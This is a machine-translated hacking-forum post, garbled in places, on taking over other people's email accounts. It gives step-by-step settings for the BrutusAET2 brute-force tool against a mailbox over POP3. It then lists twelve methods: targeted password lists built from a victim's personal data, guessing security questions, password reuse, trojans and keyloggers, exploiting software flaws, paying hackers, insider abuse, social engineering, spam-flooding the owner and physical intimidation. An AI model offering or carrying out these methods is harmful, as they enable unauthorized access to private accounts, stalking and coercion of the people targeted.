This page has been robot translated, sorry for typos if any. Original content here.

We break soap, we use BrutusAET2


And so, I want to tell you: how to hijack a soapbox (e-mail) using the BrutusAET2 program.

Let's start.

We will need :

1) The program for the partition of passwords BrutusAET2, which can be downloaded from here:

2) Dictionaries, which can be taken from here:

3) Straight arms.

For example, I will give hijacking mylnik @

Setup of the program for a partition of passwords of BrutusAET2:

1) Opened the program.
2) In the Target field we write
3) In the Type field, select POP3

Connection Options:

1) Port set 110.
2) Connections set at a maximum, ie 60.
3) Timeout set at a maximum, ie 60

POP3 options:
Do not touch =)

Authentication options:

If we want to tweak the list of soapboxes , then we need to create a textbook, let's call it users.txt, there it means we throw in lists of users.
For example:

We climb in a program there we put a tick near Username.

Use Username: specify the path to the list of users.

Go to the password list ...
Create means textovik words.txt and there we shove passwords.
For example:

We climb into the program and choose

Pass mode : Word list
Pass file : specify the path to the password list.

It is also easy to break mylniki on just put in Target: and the rest is all the same.

In general, everything should work out as in the screenshot:
Hacking mail

some useful links from me ...

Hashes: password decryption
"Click once to show a spoiler - click again to hide ..."

"Click once to show a spoiler - click again to hide ..."

links !!! All references to the World !!!

================================================= ======================

new password recovery methods

Method number 1. "Brutus" / long /

The first method we will have is Brutus (Brute Force) - a brute force method.
What you need:
1. Program for brute force BrutusA2 (WWWHack or similar)
2. Know the address of the incoming mail (pop3) of the mail service. This address is in the help or faq sections on the mailer's website.
3.Also desired passwords dictionary (Passwords List)
Pros: the password will always be selected! (if not by dictionary, then brute force)
Cons: to find it guaranteed - it may take several millennia or millions of years.
Since brute force is the longest way, and in order to reduce it somehow, it is necessary:
A. Go and register yourself a mailbox on the mailer that you will be able to play. When registering, pay attention to the "Password" field. Your task is to find out the requirements of the postal service to the minimum and maximum password length, and the characters used (next to the field, it is usually written like this).
b.Open the password dictionary (I prefer the Raptor program for such purposes), sort the dictionary by password length (from shorter to longer), remove passwords that do not fit in length to the requirements of the postal service, as well as with forbidden characters.
v.Use data from the "Collecting information" method (see below)
Help for those who do not have Internet:
Brute Force (Spoken: Brutus): Brute force selection - brute force. Example for brute force:

Example for iterating "By dictionary":
Those. Since many people use meaningful and easy-to-remember words to memorize a password, why should we go through characters for a long time if we are going to sort through words faster?
ps Where to take (mentioned in the method):
BrutusA2 ->
Raptor ->
pss About passwords which are often chosen - in another, separate article.

Method number 2. "Collecting information" / requires attention /

What you need:
Search Engines:
How we do:
We hammer in our soap in search and we look for where it meets. We go and all that we find (where it occurs, on what site, what it wrote and what it asked, when, under what login) we copy and store it in a notebook for further analysis.
After that, we analyze and draw general conclusions about the interests of the person, trying to find the found (year of birth, nickname, name, interests, etc.) as a password.
It is necessary to search for all search engines as for full soap and only by login my_email
Getting on the Forum (finding his login (nickname)): right-clicking on the image of his Avatar and looking at the path of this image (what if he didn’t upload it to the Forum but used his own one on his website? (Although he could have taken someone else’s )). We also click on his profile and everything that is there - also copy into Notepad (there may be an ICQ number and year of birth, interests, etc.). Do not forget in the profile (if any) click on the link "Find all posts by user". Carefully read. Maybe there will be a clue (keeping in mind the "Secret Question"). Everything is informative and different from "Gyg", "Lol", etc. - in Notepad.
If we find his second soap - we pass through the search engines once again.
The same applies to ICQ (in a circle on search engines). With ICQ, do not forget to look at [forbidden link]
Also, do not forget to search by soap and nickname on
If he has an original nickname - AmSuPerrR, also go over search engines. It's just that if he has a standard nickname - Alex, then you can hardly sort out 12 million pages (although you can try using the syntax of search queries and sorting “search in found”).
When you have accumulated in Notepad, perhaps a decent list of information, start from it to form a password list for this user. Moreover: the year of birth must be tried to substitute in different formats. For example, you found that the year of birth 01.01.2005
Try these options:
Also try the options (where my_email is his login):
his name is 2005
his name05
Substitute easy. Just copied into Notepad, "decompose" by words in a column, and try to write several options for each found. And after that you can use the Brutus method.
Also you check the found "second soaps" for whether they exist or not. It may turn out that they were registered long ago, and then they were no longer necessary. Then you register it for yourself and try to recover the password for it from Forums, chats, directories, etc.

Method number 3. "Password recovery" / sometimes effective /

How we do:
First, we climb to the postal service and click the link "Forgot your password!" (or similar). We look what there is a secret question.
For example, if it is “My favorite dish”, then for girls you can try to substitute the word ice cream
If "Grandmother's Year of Birth", "Passport Number", "Mother's Maiden Name" - then try 111, 123, 12345, the year of birth of your password "remind", perhaps the answer will be the year of registration of soap, etc. Since it is not often those who know the year of birth of the grandmother and remember the mother's maiden name. With the passport number is more difficult, as some really take it and drive it straight through it. But still try 111, 123 ...
Also, the data collected in the method of "collecting information" can help you here.

Added (Eco [L] og):
Sometimes a secret question can be like this: 1234567qwerty
Then, in some cases, the answer to it may be 1234567qwerty
Or similar, recruited by the method of "claudia from the bald" (pick this will be almost not realistic)

Method number 4. "Recovery from another service" / in a hurry and the password from the soap you can take, and the base of the forum / chat /

The whole point is that the password from the soap is harder to pick up than the password from the Forum, chat, dating service, live log, etc. Those. from those places that are visited or visited by the one whose soap is “restored”. From here we go around all sites, forums, etc. which came into our field of view with the method of "collecting information". We are looking at what is there, for example, for the Forum and we are already reducing our task to finding vulnerabilities to this Forum (using the same
We have a chance (not a big one, but a chance) that the password from the Forum will go to soap.

Method number 5. "Troyan" / demanding /

The method speaks for itself. The task is to boil down Troyan or some Keyloger thread (which you should have, respectively), and expect reports (logs) from them.
Here, the methods of "Vulnerability of software" and "SI / Social Engineering /" will help for pairing.

Method number 6. "Software Vulnerabilities" / requiring the necessary knowledge /

This is probably a helper method for the Trojan method. In order for the Troyan to push in, a lot of effort has to be made. But it will be easier if you know the current vulnerabilities in the software. The same browsers, mail programs (Outlook, TheBat!, Etc.), perhaps, ICQ. Then your task will be reduced to linking to a thread on your site, when a visitor accessing Troyan through a vulnerability in the browser. Or sending a "hurried" formed letter.

Method number 7. "Vulnerability of postal services" / also requiring knowledge or ability to use a search engine /

The method directly relates to the vulnerability of postal services. They sometimes come up from time to time. Starting from sending a letter, viewing which user’s browser will change which settings thread, and until a recent trick with the interception of a package changing the password of your mailbox, changing it (the package) and changing the password to the desired box. Well, etc.

Method number 8. "Have hundreds of rubles, friends will wait" / invoice. requires to have a job and wm-wallet /

You go to the okolokhake site and ask for a certain reward to “remind” the password. But here be careful when paying, as a lot of throwing up divorced (yes, that there was a divorce - they always were).
Never transfer the payment in advance (100% guarantee that no one will “remind” the password (more precisely, some people can give it, but they will be paid by you when you pay for it - before or after. And they mostly take it after order completion) .))
As a proof, do not vedis that the letter was sent from the mailbox you need.
Also, do not immediately lead when the proof will be according to the scheme:
You send any letter to the necessary box, and then (after a while) you are sent the text of this letter.
As a defense against throwing, you can use the scheme “through the Guarantor” or the scheme which is higher, but slightly corrected:
1.You agree when you are both online.
2.You send to a "required" soap for you a thread of text and you should be told immediately what text you sent.
Then at least there is a guarantee that the soap is under control. But with the transfer of money - negotiate yourself.

Method number 9. "Do not have a hundred rubles, and have a hundred friends" / the ability to make acquaintances /

Just have a good friend (admin, caliper, or, better, director) working either to the office where the soap is, or providing the hosting / Internet office to where the soap is.
Well, or, who, at the risk of acquiring a thread from the FSB, FAPSI, the Office "K" (R), will exceed his official authority, find out the password from the postal service support and inform you.
This is a very bad and wrong method. And almost very rarely (and thank God)
Or have a friend - the administrator of the Forum, chat, etc. where people are sitting. If you are not familiar, nothing prevents you as a thread to get to know him ...

Method number 10. "SI / Social Engineering /" / The most accurate method. Requires the ability to set the task, analyze. training required /

Many of the previously described methods somehow come together and overlap with this method. The same thing - this method requires some data from other methods (such as "Collecting information", "Vulnerability of mail services", etc.)
This is the most extensive and extensive method. Therefore, right now, briefly, and then put it in a separate article.
The general meaning is to ensure that the Password from the soap is obtained directly from the owner. Or to persuade him to perform any actions you need (the same guaranteed launch of Troyan).
By "learn directly from the host" it is understood that this very password the host will "tell you". But he will not even understand that without knowing it, he gave it to you (and maybe he will, but later).
ps About the SI method and its submethods - next. article (if there is a desire and interest)

Method number 11. "What the hell does he need?" / long but relatively simple method /

The essence of the method is to force the owner to abandon the mailbox voluntarily (sometimes, after all, it is necessary to “restore” not in order to read, but in order to have the necessary box). And it's easier to do it - just periodically spam this box. If the mailbox owner is not too clueless how to get rid of such spam, then in a couple of weeks he will get tired of raking out of the box or cleaning him of tons of letters and he will abandon him. And mail services are not rubber. And when there is a space limit for the box and when it is not visited, then such a box will eventually be deleted.

And finally, an alternative method
Method number 12. "Fear" / criminal /

You catch the master in the doorway ...